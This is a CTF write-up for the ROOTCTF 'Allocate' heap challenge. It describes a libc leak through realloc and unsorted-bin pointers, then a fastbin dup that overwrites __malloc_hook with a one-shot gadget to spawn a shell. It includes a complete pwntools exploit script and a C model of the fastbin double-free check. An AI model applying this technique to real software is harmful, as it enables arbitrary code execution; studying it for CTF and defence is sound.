hOwDayS Sunrin 10720


ROOTCTF Allocate

hOwDayS 2018. 3. 4. 22:49



A fastbin dup challenge.

An unsorted bin challenge.

A leak challenge that uses realloc.


RELRO: FULL RELRO

Stack Canary: Canary Found

NX: NX Enabled

PIE: PIE Enabled









Modified prints only the calloc chunks.





1. Allocate smallbin (malloc 0) (0x108)


2. Allocate fastbin (malloc 1) (0x28)


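3. Realloc the malloc 0 chunk to a size large enough that it would affect the malloc 1 chunk.

-> The original location is freed and the chunk is reallocated somewhere else

-> main_arena + 88 is written into fd and bk at the original location


4. Allocate fastbin (calloc 0) (0x28)

-> It is allocated where the original smallbin (malloc 0) was


5. Realloc calloc 0 (0x108) ("B" * 6 * 8)


6. main_arena+88 is printed right after the "B" * 6 * 8.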



After completing everything up to step 6.


For why "B" * 6 * 8 is used, see the part marked in blue.







The exploit is easier than the leak.


It is a fastbin_dup challenge.


1. Allocate fastbin(malloc 2)


2. Allocate fastbin (malloc 3)


3. free(2), free(3), free(2)


4. Allocate fastbin (same size as malloc 2)

Content = &__malloc_hook - 35


5. Allocate fastbin (same size as malloc 3)


6. Allocate fastbin (same size as malloc 2)


7. Allocate fastbin //fastbin dup

Content = "\x00" * 3 + p64(0) * 2 + oneshot_gadget


8. Allocate malloc

Any size


9. SHELL!!
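Why the free(2), free(3), free(2) order in step 3 gets past the allocator, as an added example that is not part of the original post: a simplified C model of a single fastbin that compares a head-only double-free check (the check behind glibc's "double free or corruption (fasttop)" abort) with a full-bin scan. The struct and function names are hypothetical, not glibc's, and the scan is an illustrative hardening, not glibc code.

```c
#include <stddef.h>
#include <stdio.h>
/* Simplified model of one fastbin: a singly linked LIFO list of freed chunks. */
struct chunk { struct chunk *fd; };
struct fastbin { struct chunk *top; };
enum { FREE_OK = 0, FREE_DOUBLE = -1 };

/* Head-only check: rejects a chunk only if it is currently the bin's head. */
static int free_fasttop(struct fastbin *b, struct chunk *c) {
    if (b->top == c) return FREE_DOUBLE;
    c->fd = b->top;
    b->top = c;
    return FREE_OK;
}

/* Hypothetical hardened free: reject a chunk found anywhere in the bin. */
static int free_scan(struct fastbin *b, struct chunk *c) {
    int n = 0;  /* bounded walk so a corrupted, cyclic list cannot hang us */
    for (struct chunk *p = b->top; p != NULL && n < 64; p = p->fd, n++)
        if (p == c) return FREE_DOUBLE;  /* a real allocator would abort here */
    c->fd = b->top;
    b->top = c;
    return FREE_OK;
}

static struct chunk *bin_alloc(struct fastbin *b) {
    struct chunk *c = b->top;
    if (c != NULL) b->top = c->fd;
    return c;
}

/* Replays free(2), free(3), free(2), then allocates three times.
   Returns 1 if the first and third allocation are the same chunk. */
int replay(int (*free_fn)(struct fastbin *, struct chunk *), int *third_rc) {
    struct chunk c2 = {NULL}, c3 = {NULL};
    struct fastbin bin = {NULL};
    free_fn(&bin, &c2);
    free_fn(&bin, &c3);
    *third_rc = free_fn(&bin, &c2);   /* the second free of chunk 2 */
    struct chunk *a = bin_alloc(&bin);
    (void)bin_alloc(&bin);
    struct chunk *c = bin_alloc(&bin);
    return a != NULL && a == c;
}

int main(void) {
    int rc;
    printf("head-only check: aliased=%d\n", replay(free_fasttop, &rc));
    printf("full-bin scan:   aliased=%d\n", replay(free_scan, &rc));
}
```

With the head-only check the bin hands out chunk 2 twice, which is the state steps 4 to 6 depend on; with the scan the second free of chunk 2 is rejected and no aliasing occurs.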









```python
from pwn import *

p = process("./Allocate")

# Menu helpers: each one answers the binary's prompts in order.
def malloc_Allocate(size, content):
    p.recv()
    p.sendline(str(1))      # Allocate menu
    p.recv()
    p.sendline(str(1))      # malloc
    p.recv()
    p.sendline(str(size))
    p.recv()
    p.send(content)
    p.recv()
    p.sendline(str(6))      # back to the main menu

def calloc_Allocate(size, content):
    p.recv()
    p.sendline(str(1))      # Allocate menu
    p.recv()
    p.sendline(str(2))      # calloc
    p.recv()
    p.sendline(str(size))
    p.recv()
    p.send(content)
    p.recv()
    p.sendline(str(6))

def realloc_Allocate(choice, index, data, size):  # choice: 1 = malloc, 2 = calloc
    p.recv()
    p.sendline(str(1))      # Allocate menu
    p.recv()
    p.sendline(str(3))      # realloc
    p.recv()
    p.sendline(str(size))
    p.recv()
    p.sendline(str(choice))
    p.recv()
    p.sendline(str(index))
    p.recv()
    p.send(data)
    p.recv()
    p.sendline(str(6))

def Modified(content, index, size):
    p.recv()
    p.sendline(str(2))
    p.recv()
    p.send(content)
    p.recv()
    p.sendline(str(index))
    p.recv()
    p.sendline(str(size))

def Free(choice, index):  # choice: 1 = malloc, 2 = calloc
    p.recv()
    p.sendline(str(1222))
    p.recv()
    p.sendline(str(choice))
    p.recv()
    p.sendline(str(index))

# Offsets inside libc
main_arena = 0x3c4b20
oneshot_target = 0x3c4b10 - 35   # &__malloc_hook - 35
oneshot = 0xf1147                # oneshot gadget

## Leak
malloc_Allocate(0x108, "A")                  # m 0
malloc_Allocate(0x28, "A")                   # m 1
realloc_Allocate(1, 0, "B", 0x208)           # m 0 moves; old spot gets main_arena + 88
calloc_Allocate(0x28, "A" * 0x28)            # c 0, placed where m 0 used to be
realloc_Allocate(2, 0, "B" * 6 * 8, 0x108)

p.recv()
p.sendline(str(3))
p.recvuntil("B" * 6 * 8)
# 6 leaked bytes padded to 8; byte strings keep this valid on Python 3 as well
libc_base = u64(p.recv(6) + b"\x00\x00") - main_arena - 88

log.info("Leak libc : " + hex(libc_base))

## Exploit
malloc_Allocate(0x68, "A")                   # m 2
malloc_Allocate(0x68, "B")                   # m 3
# fastbin_dup
Free(1, 2)
Free(1, 3)
Free(1, 2)
malloc_Allocate(0x68, p64(libc_base + oneshot_target))
malloc_Allocate(0x68, "A")
malloc_Allocate(0x68, "A")
malloc_Allocate(0x68, b"\x00" * 3 + p64(0) * 2 + p64(libc_base + oneshot))

## Shell!
# malloc_Allocate(0x10, "A")
# Trigger one more malloc by hand so the interactive session takes over afterwards
p.recv()
p.sendline(str(1))
p.recv()
p.sendline(str(1))
p.recv()
p.sendline(str(0x20))
p.interactive()
```
 





The code is based on https://github.com/LYoungJoo/CTF/blob/master/JuniorCTF/RootCTF/RootCTF.md.


Heap challenges are fun too.
